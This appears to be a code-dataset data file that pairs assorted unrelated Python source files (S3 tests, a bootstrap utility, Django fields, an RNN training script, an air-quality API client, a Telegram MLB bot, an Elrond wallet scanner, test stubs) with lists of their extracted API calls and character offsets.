logging.info(f'Output model: {output_folder}')
|
[
"tempfile.TemporaryDirectory",
"py_profiler.profiler",
"py_profiler.profiling_service.as_table",
"logging.info",
"uuid.uuid1"
] |
[((234, 263), 'py_profiler.profiler', 'profiler', (['"""train_spacy_model"""'], {}), "('train_spacy_model')\n", (242, 263), False, 'from py_profiler import profiler, profiling_service\n'), ((1376, 1422), 'logging.info', 'logging.info', (['f"""Output model: {output_folder}"""'], {}), "(f'Output model: {output_folder}')\n", (1388, 1422), False, 'import logging\n'), ((427, 456), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (454, 456), False, 'import tempfile\n'), ((1342, 1370), 'py_profiler.profiling_service.as_table', 'profiling_service.as_table', ([], {}), '()\n', (1368, 1370), False, 'from py_profiler import profiler, profiling_service\n'), ((509, 516), 'uuid.uuid1', 'uuid1', ([], {}), '()\n', (514, 516), False, 'from uuid import uuid1\n'), ((562, 569), 'uuid.uuid1', 'uuid1', ([], {}), '()\n', (567, 569), False, 'from uuid import uuid1\n')]
|
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To see moto-server logs
# pytest -s -p no:logging tests/test_aio_s3fs.py
import pytest
@pytest.mark.asyncio
async def test_pandas_s3_io(
aio_s3_bucket, aio_s3fs
):
import numpy as np
import pandas as pd
s3_file = f"s3://{aio_s3_bucket}/data.csv"
print(s3_file)
data = {"1": np.random.rand(5)}
df = pd.DataFrame(data=data)
df.to_csv(s3_file)
s3_df = pd.read_csv(s3_file, index_col=0)
assert isinstance(s3_df, pd.DataFrame)
pd.testing.assert_frame_equal(df, s3_df)
@pytest.mark.asyncio
async def test_zarr_s3_io(
aio_s3_bucket, aio_s3fs
):
import numpy as np
import pandas as pd
import s3fs
import xarray as xr
fmap = s3fs.S3Map(f"s3://{aio_s3_bucket}/test_datasets/test.zarr", s3=s3fs.S3FileSystem())
print(fmap.root)
ds = xr.Dataset(
{"foo": (("x", "y"), np.random.rand(4, 5))},
coords={
"x": [10, 20, 30, 40],
"y": pd.date_range("2000-01-01", periods=5),
"z": ("x", list("abcd")),
},
)
ds.to_zarr(fmap, consolidated=True)
s3_ds = xr.open_zarr(fmap, consolidated=True)
assert isinstance(s3_ds, xr.Dataset)
xr.testing.assert_equal(ds, s3_ds)
|
[
"pandas.DataFrame",
"pandas.testing.assert_frame_equal",
"xarray.testing.assert_equal",
"pandas.date_range",
"pandas.read_csv",
"s3fs.S3FileSystem",
"xarray.open_zarr",
"numpy.random.rand"
] |
[((902, 925), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'data'}), '(data=data)\n', (914, 925), True, 'import pandas as pd\n'), ((961, 994), 'pandas.read_csv', 'pd.read_csv', (['s3_file'], {'index_col': '(0)'}), '(s3_file, index_col=0)\n', (972, 994), True, 'import pandas as pd\n'), ((1042, 1082), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['df', 's3_df'], {}), '(df, s3_df)\n', (1071, 1082), True, 'import pandas as pd\n'), ((1658, 1695), 'xarray.open_zarr', 'xr.open_zarr', (['fmap'], {'consolidated': '(True)'}), '(fmap, consolidated=True)\n', (1670, 1695), True, 'import xarray as xr\n'), ((1741, 1775), 'xarray.testing.assert_equal', 'xr.testing.assert_equal', (['ds', 's3_ds'], {}), '(ds, s3_ds)\n', (1764, 1775), True, 'import xarray as xr\n'), ((874, 891), 'numpy.random.rand', 'np.random.rand', (['(5)'], {}), '(5)\n', (888, 891), True, 'import numpy as np\n'), ((1326, 1345), 's3fs.S3FileSystem', 's3fs.S3FileSystem', ([], {}), '()\n', (1343, 1345), False, 'import s3fs\n'), ((1418, 1438), 'numpy.random.rand', 'np.random.rand', (['(4)', '(5)'], {}), '(4, 5)\n', (1432, 1438), True, 'import numpy as np\n'), ((1511, 1549), 'pandas.date_range', 'pd.date_range', (['"""2000-01-01"""'], {'periods': '(5)'}), "('2000-01-01', periods=5)\n", (1524, 1549), True, 'import pandas as pd\n')]
|
# =============================================================================
# render_scriptlets.py
#
# This file handles serving the sample scripts.
#
# December 2015
#
# Copyright (c) 2015 by cisco Systems, Inc.
# All rights reserved.
# =============================================================================
import json, os, re
from collections import OrderedDict
from m2m_demo.frontend import RegisterPage, BaseResource
scriptlets = None
def get_scriptlet_names(cfg):
maybe_load_scriptlets(cfg)
return scriptlets.keys()
def maybe_load_scriptlets(cfg):
if scriptlets is not None:
return
global scriptlets
scriptlets = OrderedDict()
scriptlet_dir = os.path.join(cfg['assets'], 'scriptlets')
for root, dirs, files in os.walk(scriptlet_dir):
for filename in files:
contents = open(os.path.join(root, filename)).read()
m = re.search('_(.*)\.py', filename)
if m:
filename = m.group(1)
scriptlets[filename] = contents
class ScriptletsPage(BaseResource):
"""
Serve up scriptlets as a json object
"""
def render_GET(self, request):
request.setHeader('Content-Type', 'application/json')
maybe_load_scriptlets(self.cfg)
return json.dumps(scriptlets)
page = RegisterPage(ScriptletsPage, '/scriptlets')
|
[
"os.walk",
"m2m_demo.frontend.RegisterPage",
"json.dumps",
"re.search",
"collections.OrderedDict",
"os.path.join"
] |
[((1314, 1357), 'm2m_demo.frontend.RegisterPage', 'RegisterPage', (['ScriptletsPage', '"""/scriptlets"""'], {}), "(ScriptletsPage, '/scriptlets')\n", (1326, 1357), False, 'from m2m_demo.frontend import RegisterPage, BaseResource\n'), ((663, 676), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (674, 676), False, 'from collections import OrderedDict\n'), ((697, 738), 'os.path.join', 'os.path.join', (["cfg['assets']", '"""scriptlets"""'], {}), "(cfg['assets'], 'scriptlets')\n", (709, 738), False, 'import json, os, re\n'), ((768, 790), 'os.walk', 'os.walk', (['scriptlet_dir'], {}), '(scriptlet_dir)\n', (775, 790), False, 'import json, os, re\n'), ((1283, 1305), 'json.dumps', 'json.dumps', (['scriptlets'], {}), '(scriptlets)\n', (1293, 1305), False, 'import json, os, re\n'), ((904, 937), 're.search', 're.search', (['"""_(.*)\\\\.py"""', 'filename'], {}), "('_(.*)\\\\.py', filename)\n", (913, 937), False, 'import json, os, re\n'), ((851, 879), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (863, 879), False, 'import json, os, re\n')]
|
import numpy as np
import multiprocessing
from abito.lib.stats.weighted import _quantile_sorted, _sort_obs
__all__ = ['generate_bootstrap_estimates']
def _do_bootstrap_plain(obs, stat_func, stat_args, n_iters, seed):
np.random.seed(seed)
nobs = obs.shape[0]
result = []
for i in range(n_iters):
new_ind = np.random.choice(nobs, nobs, replace=True)
obs_new = obs[new_ind]
result.append(stat_func(obs_new, **stat_args))
return result
def _do_bootstrap_weighted(obs, weights, stat_func, stat_args, n_iters, seed):
np.random.seed(seed)
if stat_func.__name__ == 'quantile':
obs, weights = _sort_obs(obs, weights)
stat_func = _quantile_sorted
nobs = weights.sum()
ps = weights / nobs
result = []
for i in range(n_iters):
new_weights = np.random.multinomial(nobs, ps)
weights = new_weights
result.append(stat_func(weights=weights, obs=obs, **stat_args))
return result
def _prepare_bootstrap_procedure(obs, weights, stat_func, n_iters, **stat_args):
if weights.shape[0] == 0:
func = _do_bootstrap_plain
args = (obs, stat_func, stat_args, n_iters)
else:
func = _do_bootstrap_weighted
args = (obs, weights, stat_func, stat_args, n_iters)
return func, args
def generate_bootstrap_estimates(obs, stat_func, n_iters, weights=np.empty(0), n_threads=1, **stat_args):
n_threads = multiprocessing.cpu_count() if n_threads == -1 else n_threads
if n_threads <= 1:
func, args = _prepare_bootstrap_procedure(obs, weights, stat_func, n_iters, **stat_args)
seed = np.random.randint(2**32)
results = np.asarray(func(*args, seed))
else:
with multiprocessing.Pool(n_threads) as pool:
n_iters_per_thread = int(n_iters / n_threads)
pool_results = []
seeds = np.random.randint(2**32, size=n_threads)
for seed in seeds:
func, args = _prepare_bootstrap_procedure(obs, weights, stat_func, n_iters_per_thread, **stat_args)
r = pool.apply_async(func, (*args, seed))
pool_results.append(r)
results = []
[results.extend(r.get()) for r in pool_results]
results = np.asarray(results)
return results
|
[
"numpy.random.seed",
"abito.lib.stats.weighted._sort_obs",
"numpy.empty",
"numpy.random.multinomial",
"numpy.asarray",
"multiprocessing.Pool",
"numpy.random.randint",
"numpy.random.choice",
"multiprocessing.cpu_count"
] |
[((225, 245), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (239, 245), True, 'import numpy as np\n'), ((566, 586), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (580, 586), True, 'import numpy as np\n'), ((1382, 1393), 'numpy.empty', 'np.empty', (['(0)'], {}), '(0)\n', (1390, 1393), True, 'import numpy as np\n'), ((334, 376), 'numpy.random.choice', 'np.random.choice', (['nobs', 'nobs'], {'replace': '(True)'}), '(nobs, nobs, replace=True)\n', (350, 376), True, 'import numpy as np\n'), ((652, 675), 'abito.lib.stats.weighted._sort_obs', '_sort_obs', (['obs', 'weights'], {}), '(obs, weights)\n', (661, 675), False, 'from abito.lib.stats.weighted import _quantile_sorted, _sort_obs\n'), ((831, 862), 'numpy.random.multinomial', 'np.random.multinomial', (['nobs', 'ps'], {}), '(nobs, ps)\n', (852, 862), True, 'import numpy as np\n'), ((1438, 1465), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (1463, 1465), False, 'import multiprocessing\n'), ((1635, 1661), 'numpy.random.randint', 'np.random.randint', (['(2 ** 32)'], {}), '(2 ** 32)\n', (1652, 1661), True, 'import numpy as np\n'), ((1731, 1762), 'multiprocessing.Pool', 'multiprocessing.Pool', (['n_threads'], {}), '(n_threads)\n', (1751, 1762), False, 'import multiprocessing\n'), ((1880, 1922), 'numpy.random.randint', 'np.random.randint', (['(2 ** 32)'], {'size': 'n_threads'}), '(2 ** 32, size=n_threads)\n', (1897, 1922), True, 'import numpy as np\n'), ((2272, 2291), 'numpy.asarray', 'np.asarray', (['results'], {}), '(results)\n', (2282, 2291), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
from functools import partial
from django.core.validators import MaxValueValidator
from django.db import models
from django.db.models.fields import PositiveIntegerField
from cms.models.pluginmodel import CMSPlugin
import sortedm2m.fields
from allink_core.core.forms import fields
# Add an app namespace to related_name to avoid field name clashes
# with any other plugins that have a field with the same name as the
# lowercase of the class name of this model.
# https://github.com/divio/django-cms/issues/5030
CMSPluginField = partial(
models.OneToOneField,
to=CMSPlugin,
on_delete=models.CASCADE,
related_name='%(app_label)s_%(class)s',
parent_link=True,
)
class Icon(models.CharField):
default_field_class = fields.Icon
south_field_class = 'django.db.models.fields.CharField'
def __init__(self, *args, **kwargs):
if 'verbose_name' not in kwargs:
kwargs['verbose_name'] = 'Icon'
if 'max_length' not in kwargs:
kwargs['max_length'] = 255
if 'blank' not in kwargs:
kwargs['blank'] = True
if 'default' not in kwargs:
kwargs['default'] = self.default_field_class.DEFAULT
super(Icon, self).__init__(*args, **kwargs)
def formfield(self, **kwargs):
defaults = {
'form_class': self.default_field_class,
}
defaults.update(kwargs)
return super(Icon, self).formfield(**defaults)
class SortedM2MModelField(sortedm2m.fields.SortedManyToManyField):
default_field_class = fields.SortedM2MFormField
def formfield(self, **kwargs):
defaults = {
'form_class': self.default_field_class,
}
defaults.update(kwargs)
return super(SortedM2MModelField, self).formfield(**defaults)
|
[
"functools.partial"
] |
[((554, 685), 'functools.partial', 'partial', (['models.OneToOneField'], {'to': 'CMSPlugin', 'on_delete': 'models.CASCADE', 'related_name': '"""%(app_label)s_%(class)s"""', 'parent_link': '(True)'}), "(models.OneToOneField, to=CMSPlugin, on_delete=models.CASCADE,\n related_name='%(app_label)s_%(class)s', parent_link=True)\n", (561, 685), False, 'from functools import partial\n')]
|
import argparse
import data
import models
from torch.utils.data import DataLoader
from torch.optim import Adam
from torch.optim.lr_scheduler import ExponentialLR
from torch.nn import BCEWithLogitsLoss
from torch import cuda
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--epochs', type=int, default=5)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gamma', type=float, default=1-1e-5)
parser.add_argument('--embedding_size', type=int, default=300)
parser.add_argument('--hidden_size', type=int, default=150)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--clip', type=float, default=None)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--rnn', choices=['vanilla', 'lstm', 'gru'], default='lstm')
parser.add_argument('--bidirectional', action='store_true', default=False)
args = parser.parse_args()
train_dataset = data.NLPDataset.from_file('data/sst_train_raw.csv')
text_vocab = train_dataset.text_vocab
labels_vocab = train_dataset.labels_vocab
test_dataset = data.NLPDataset.from_file('data/sst_test_raw.csv', text_vocab, labels_vocab)
val_dataset = data.NLPDataset.from_file('data/sst_valid_raw.csv', text_vocab, labels_vocab)
embedding = text_vocab.create_embedding_matrix(args.embedding_size, path_to_embeddings='data/sst_glove_6b_300d.txt')
# model = models.AvgPoolingModel(embedding, embedding_size=args.embedding_size)
model = models.RNNModel(
args.rnn,
embedding,
input_size=args.embedding_size,
hidden_size=args.hidden_size,
num_layers=args.num_layers,
bidirectional=args.bidirectional
)
optimizer = Adam(model.parameters(), lr=args.lr)
scheduler = ExponentialLR(optimizer, gamma=args.gamma)
criterion = BCEWithLogitsLoss()
if cuda.is_available():
print("Using GPU")
model.to('cuda')
for epoch in range(args.epochs):
train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True,
collate_fn=data.pad_collate_fn)
val_dataloader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=True, collate_fn=data.pad_collate_fn)
models.train(model, train_dataloader, optimizer, criterion, scheduler, args.clip)
metrics = models.evaluate(model, val_dataloader, criterion)
print(f"Epoch {epoch+1}: validation loss = {metrics['loss']} validation accuracy: {metrics['accuracy']}")
test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True, collate_fn=data.pad_collate_fn)
metrics = models.evaluate(model, test_dataloader, criterion)
print()
print(f"Test loss = {metrics['loss']} test accuracy = {metrics['accuracy']}")
cuda.empty_cache()
|
[
"models.train",
"torch.nn.BCEWithLogitsLoss",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"data.NLPDataset.from_file",
"models.evaluate",
"models.RNNModel",
"torch.cuda.is_available",
"torch.optim.lr_scheduler.ExponentialLR",
"torch.cuda.empty_cache"
] |
[((266, 291), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (289, 291), False, 'import argparse\n'), ((1000, 1051), 'data.NLPDataset.from_file', 'data.NLPDataset.from_file', (['"""data/sst_train_raw.csv"""'], {}), "('data/sst_train_raw.csv')\n", (1025, 1051), False, 'import data\n'), ((1159, 1235), 'data.NLPDataset.from_file', 'data.NLPDataset.from_file', (['"""data/sst_test_raw.csv"""', 'text_vocab', 'labels_vocab'], {}), "('data/sst_test_raw.csv', text_vocab, labels_vocab)\n", (1184, 1235), False, 'import data\n'), ((1254, 1331), 'data.NLPDataset.from_file', 'data.NLPDataset.from_file', (['"""data/sst_valid_raw.csv"""', 'text_vocab', 'labels_vocab'], {}), "('data/sst_valid_raw.csv', text_vocab, labels_vocab)\n", (1279, 1331), False, 'import data\n'), ((1550, 1719), 'models.RNNModel', 'models.RNNModel', (['args.rnn', 'embedding'], {'input_size': 'args.embedding_size', 'hidden_size': 'args.hidden_size', 'num_layers': 'args.num_layers', 'bidirectional': 'args.bidirectional'}), '(args.rnn, embedding, input_size=args.embedding_size,\n hidden_size=args.hidden_size, num_layers=args.num_layers, bidirectional\n =args.bidirectional)\n', (1565, 1719), False, 'import models\n'), ((1835, 1877), 'torch.optim.lr_scheduler.ExponentialLR', 'ExponentialLR', (['optimizer'], {'gamma': 'args.gamma'}), '(optimizer, gamma=args.gamma)\n', (1848, 1877), False, 'from torch.optim.lr_scheduler import ExponentialLR\n'), ((1894, 1913), 'torch.nn.BCEWithLogitsLoss', 'BCEWithLogitsLoss', ([], {}), '()\n', (1911, 1913), False, 'from torch.nn import BCEWithLogitsLoss\n'), ((1922, 1941), 'torch.cuda.is_available', 'cuda.is_available', ([], {}), '()\n', (1939, 1941), False, 'from torch import cuda\n'), ((2617, 2719), 'torch.utils.data.DataLoader', 'DataLoader', (['test_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'collate_fn': 'data.pad_collate_fn'}), '(test_dataset, batch_size=args.batch_size, shuffle=True,\n collate_fn=data.pad_collate_fn)\n', (2627, 2719), False, 'from torch.utils.data import DataLoader\n'), ((2730, 2780), 'models.evaluate', 'models.evaluate', (['model', 'test_dataloader', 'criterion'], {}), '(model, test_dataloader, criterion)\n', (2745, 2780), False, 'import models\n'), ((2879, 2897), 'torch.cuda.empty_cache', 'cuda.empty_cache', ([], {}), '()\n', (2895, 2897), False, 'from torch import cuda\n'), ((2060, 2163), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'collate_fn': 'data.pad_collate_fn'}), '(train_dataset, batch_size=args.batch_size, shuffle=True,\n collate_fn=data.pad_collate_fn)\n', (2070, 2163), False, 'from torch.utils.data import DataLoader\n'), ((2223, 2324), 'torch.utils.data.DataLoader', 'DataLoader', (['val_dataset'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'collate_fn': 'data.pad_collate_fn'}), '(val_dataset, batch_size=args.batch_size, shuffle=True,\n collate_fn=data.pad_collate_fn)\n', (2233, 2324), False, 'from torch.utils.data import DataLoader\n'), ((2330, 2416), 'models.train', 'models.train', (['model', 'train_dataloader', 'optimizer', 'criterion', 'scheduler', 'args.clip'], {}), '(model, train_dataloader, optimizer, criterion, scheduler, args\n .clip)\n', (2342, 2416), False, 'import models\n'), ((2430, 2479), 'models.evaluate', 'models.evaluate', (['model', 'val_dataloader', 'criterion'], {}), '(model, val_dataloader, criterion)\n', (2445, 2479), False, 'import models\n')]
|
# -*- coding: utf-8 -*-
#
from __future__ import absolute_import
import os
import sys
def is_frozen():
"""
:return: True if the executable is currently frozen
"""
return getattr(sys, 'frozen', False)
def _resource_path_frozen(relative_path):
"""
:return: PyInstaller frozen path to resource
"""
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(base_path, relative_path)
def _resource_path_dev(relative_path):
"""
:return: Package relative path to resource
"""
base_path = os.path.dirname(os.path.abspath(__file__))
return os.path.join(base_path, relative_path)
def resource_path(relative_path):
"""
Get absolute path to resource, works for dev and for PyInstaller
"""
return _resource_path_frozen(relative_path) if is_frozen() else _resource_path_dev(relative_path)
|
[
"os.path.abspath",
"os.path.join"
] |
[((424, 462), 'os.path.join', 'os.path.join', (['base_path', 'relative_path'], {}), '(base_path, relative_path)\n', (436, 462), False, 'import os\n'), ((637, 675), 'os.path.join', 'os.path.join', (['base_path', 'relative_path'], {}), '(base_path, relative_path)\n', (649, 675), False, 'import os\n'), ((599, 624), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (614, 624), False, 'import os\n'), ((385, 410), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (400, 410), False, 'import os\n')]
|
import math
import torch
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import torch.nn as nn
from torch.nn import functional as F
import numpy as np
class Relational_Embeding(Module):
"""
"""
def __init__(self, input_dim, output_dim, hr=2,bias=True):
super(Relational_Embeding, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.W = nn.Parameter(torch.FloatTensor(input_dim, input_dim))
#self.W = nn.Parameter(nn.init.xavier_uniform(torch.Tensor(input_dim, int(input_dim / hr)).type(torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor), gain=np.sqrt(2.0)))
self.H = nn.Parameter(torch.FloatTensor(input_dim, int(input_dim / hr)))
self.fc0 = nn.Linear(int(input_dim / hr), input_dim)
#self.fc0.weight = torch.nn.init.xavier_normal(self.fc0.weight, gain=np.sqrt(2.0))
self.fc1 = nn.Linear(input_dim, output_dim)
#self.fc1.weight = torch.nn.init.xavier_normal(self.fc1.weight, gain=np.sqrt(2.0))
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.W.size(1))
self.W.data.uniform_(-stdv, stdv)
stdv = 1. / math.sqrt(self.H.size(1))
self.H.data.uniform_(-stdv, stdv)
stdv = 1. / math.sqrt(self.fc0.weight.size(1))
self.fc0.weight.data.uniform_(-stdv, stdv)
stdv = 1. / math.sqrt(self.fc1.weight.size(1))
self.fc1.weight.data.uniform_(-stdv, stdv)
def forward(self, input, im_inds):
'''
Args:
input: shape: num_obj, hid_dim
adj: shape: num_obj, num_obj
Returns:
'''
#print('input: ',input)
rel1_ = F.sigmoid(torch.mm(torch.mm(input, self.W), input.permute(1, 0)))
#print('rel1_: ', rel1_)
rel1_exp = torch.exp(rel1_)
rel1_exp = rel1_exp * (im_inds[:,None]==im_inds[None,:]).type_as(rel1_exp)
#print('rel1_exp: ', rel1_exp)
#print('(torch.sum(rel1_exp, -1)+1e-8): ',(torch.sum(rel1_exp, -1)+1e-8)[:,None])
rel1 = rel1_exp / (torch.sum(rel1_exp, -1)+1e-8)[:,None]
#print('rel1: ', rel1)
output1 = input + self.fc0(torch.mm(rel1, torch.mm(input, self.H)))
output2 = self.fc1(output1)
return output1, output2
|
[
"torch.FloatTensor",
"torch.mm",
"torch.exp",
"torch.nn.Linear",
"torch.sum"
] |
[((976, 1008), 'torch.nn.Linear', 'nn.Linear', (['input_dim', 'output_dim'], {}), '(input_dim, output_dim)\n', (985, 1008), True, 'import torch.nn as nn\n'), ((1936, 1952), 'torch.exp', 'torch.exp', (['rel1_'], {}), '(rel1_)\n', (1945, 1952), False, 'import torch\n'), ((477, 516), 'torch.FloatTensor', 'torch.FloatTensor', (['input_dim', 'input_dim'], {}), '(input_dim, input_dim)\n', (494, 516), False, 'import torch\n'), ((1835, 1858), 'torch.mm', 'torch.mm', (['input', 'self.W'], {}), '(input, self.W)\n', (1843, 1858), False, 'import torch\n'), ((2196, 2219), 'torch.sum', 'torch.sum', (['rel1_exp', '(-1)'], {}), '(rel1_exp, -1)\n', (2205, 2219), False, 'import torch\n'), ((2317, 2340), 'torch.mm', 'torch.mm', (['input', 'self.H'], {}), '(input, self.H)\n', (2325, 2340), False, 'import torch\n')]
|
# env: py3
# Author: <NAME>
import pandas as pd
import datetime
import urllib
from urllib.request import urlopen
def AirNow():
baseURL = "http://www.airnowapi.org/aq/forecast/"
api_key = '###YOUR_API_KEY###'
#date = '2018-08-04'
# get the current date as input
now = datetime.datetime.now()
date = str(now)
miles = 25
dfs = list()
text_file = open("INPUT.txt", "r")
latlong = text_file.read().split(' ')
text_file.close()
lat = latlong[0::2]
lon = latlong[1::2]
for lats, lons in zip(lat, lon):
latlonURL = baseURL + "latLong/?" + urllib.parse.urlencode({
'format': 'application/json',
'latitude': lats,
'longitude': lons,
'date': date[:10],
'distance': miles,
'API_KEY': api_key
})
response = urlopen(latlonURL).read().decode('utf-8')
df = pd.read_json(response)
#df = df.assign(Zipcode=zipcode)
dfs.append(df)
results = pd.concat(dfs)
#columns = ['ActionDay', 'Category', 'DateIssue', 'Discussion', 'Latitude', 'Longitude']
#results.drop(columns, inplace=True, axis=1)
return results
def main():
results = AirNow()
print("\nAQI data collected:\n\n", results)
results.to_csv('AQI_output.csv', index=False)
if __name__ == "__main__":
main()
|
[
"urllib.parse.urlencode",
"urllib.request.urlopen",
"pandas.read_json",
"datetime.datetime.now",
"pandas.concat"
] |
[((287, 310), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (308, 310), False, 'import datetime\n'), ((970, 984), 'pandas.concat', 'pd.concat', (['dfs'], {}), '(dfs)\n', (979, 984), True, 'import pandas as pd\n'), ((873, 895), 'pandas.read_json', 'pd.read_json', (['response'], {}), '(response)\n', (885, 895), True, 'import pandas as pd\n'), ((581, 738), 'urllib.parse.urlencode', 'urllib.parse.urlencode', (["{'format': 'application/json', 'latitude': lats, 'longitude': lons, 'date':\n date[:10], 'distance': miles, 'API_KEY': api_key}"], {}), "({'format': 'application/json', 'latitude': lats,\n 'longitude': lons, 'date': date[:10], 'distance': miles, 'API_KEY':\n api_key})\n", (603, 738), False, 'import urllib\n'), ((820, 838), 'urllib.request.urlopen', 'urlopen', (['latlonURL'], {}), '(latlonURL)\n', (827, 838), False, 'from urllib.request import urlopen\n')]
|
from telegram.ext import Updater
import logging
from telegram.ext import CommandHandler
import mlbgame
import datetime
updater = Updater(token='<KEY>')
dispatcher = updater.dispatcher
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO)
def start(bot, update):
bot.send_message(chat_id=update.message.chat_id, text="Hello I am the bot that will help you to know the MLB results")
def today_stats(bot, update):
today = datetime.date.today()
year = today.year
month = today.month
day = today.day
games = mlbgame.day(year, month, day)
msg = ""
for game in games:
game_txt = "{}\n".format(game)
msg += game_txt
bot.send_message(chat_id=update.message.chat_id, text=msg)
start_handler = CommandHandler('start', start)
stats_handler = CommandHandler('today', today_stats)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(stats_handler)
updater.start_polling()
|
[
"logging.basicConfig",
"mlbgame.day",
"datetime.date.today",
"telegram.ext.Updater",
"telegram.ext.CommandHandler"
] |
[((130, 152), 'telegram.ext.Updater', 'Updater', ([], {'token': '"""<KEY>"""'}), "(token='<KEY>')\n", (137, 152), False, 'from telegram.ext import Updater\n'), ((185, 292), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n", (204, 292), False, 'import logging\n'), ((786, 816), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""start"""', 'start'], {}), "('start', start)\n", (800, 816), False, 'from telegram.ext import CommandHandler\n'), ((833, 869), 'telegram.ext.CommandHandler', 'CommandHandler', (['"""today"""', 'today_stats'], {}), "('today', today_stats)\n", (847, 869), False, 'from telegram.ext import CommandHandler\n'), ((477, 498), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (496, 498), False, 'import datetime\n'), ((577, 606), 'mlbgame.day', 'mlbgame.day', (['year', 'month', 'day'], {}), '(year, month, day)\n', (588, 606), False, 'import mlbgame\n')]
|
from Python_libraries.SC_flow import SC_flow
import requests
from Python_libraries.const import *
from Python_libraries.Users import get_users, get_user_address
def scan_wallet(user_address) :
# api-endpoint
URL = "https://devnet-api.elrond.com"
# sending get request and saving the response as response object
nfts_requests = requests.get(url = URL+"/accounts/"+user_address+"/nfts")
tokens_requests = requests.get(url = URL+"/accounts/"+user_address+"/tokens")
print("\n" + 20*"*" + "Tokens" + 20*"*" + "\n")
for token in tokens_requests.json() :
if token["identifier"] in AUTHORIZED_TOKENS :
amount = int(float(token["balance"])/10**float(token["decimals"]))
print(f"{amount} "+token["identifier"])
print("\n" + 20*"*" + "NFTs" + 20*"*" + "\n")
for nft in nfts_requests.json() :
id_collection = nft["collection"]
if id_collection not in AUTHORIZED_TOKENS :
continue
if nft["type"] == "SemiFungibleESDT" :
amount = nft["balance"]
print(f"{amount} SFT of collection {id_collection} ")
elif nft["type"] == "MetaESDT" :
amount = int(float(nft["balance"])/10**float(nft["decimals"]))
print(f"{amount} {id_collection} ")
else:
id_NFT = nft["nonce"]
print(f"NFT n°{id_NFT} of collection {id_collection} ")
# Use the smart contract object
smart_contract = SC_flow()
print("\n Wallet buyer : ")
scan_wallet(get_user_address(get_users()["alice"]))
print("\nWallet seller : ")
scan_wallet(get_user_address(get_users()["bob"]))
|
[
"Python_libraries.Users.get_users",
"Python_libraries.SC_flow.SC_flow",
"requests.get"
] |
[((1479, 1488), 'Python_libraries.SC_flow.SC_flow', 'SC_flow', ([], {}), '()\n', (1486, 1488), False, 'from Python_libraries.SC_flow import SC_flow\n'), ((347, 408), 'requests.get', 'requests.get', ([], {'url': "(URL + '/accounts/' + user_address + '/nfts')"}), "(url=URL + '/accounts/' + user_address + '/nfts')\n", (359, 408), False, 'import requests\n'), ((427, 490), 'requests.get', 'requests.get', ([], {'url': "(URL + '/accounts/' + user_address + '/tokens')"}), "(url=URL + '/accounts/' + user_address + '/tokens')\n", (439, 490), False, 'import requests\n'), ((1549, 1560), 'Python_libraries.Users.get_users', 'get_users', ([], {}), '()\n', (1558, 1560), False, 'from Python_libraries.Users import get_users, get_user_address\n'), ((1630, 1641), 'Python_libraries.Users.get_users', 'get_users', ([], {}), '()\n', (1639, 1641), False, 'from Python_libraries.Users import get_users, get_user_address\n')]
|
import unittest
class TestGetNameBaseForObject(unittest.TestCase):
def test_get_name_base_for_object(self):
# self.assertEqual(expected, get_name_base_for_object(obj))
assert False # TODO: implement your test here
class TestGetNextName(unittest.TestCase):
def test_get_next_name(self):
# self.assertEqual(expected, get_next_name(names, base))
assert False # TODO: implement your test here
class TestAssignNameToObject(unittest.TestCase):
def test_assign_name_to_object(self):
# self.assertEqual(expected, assign_name_to_object(obj, assigned_names, rename))
assert False # TODO: implement your test here
class TestAssignNamesToObjects(unittest.TestCase):
def test_assign_names_to_objects(self):
# self.assertEqual(expected, assign_names_to_objects(objects, names, rename))
assert False # TODO: implement your test here
class TestObjectsOnly(unittest.TestCase):
def test_objects_only(self):
# self.assertEqual(expected, objects_only(events))
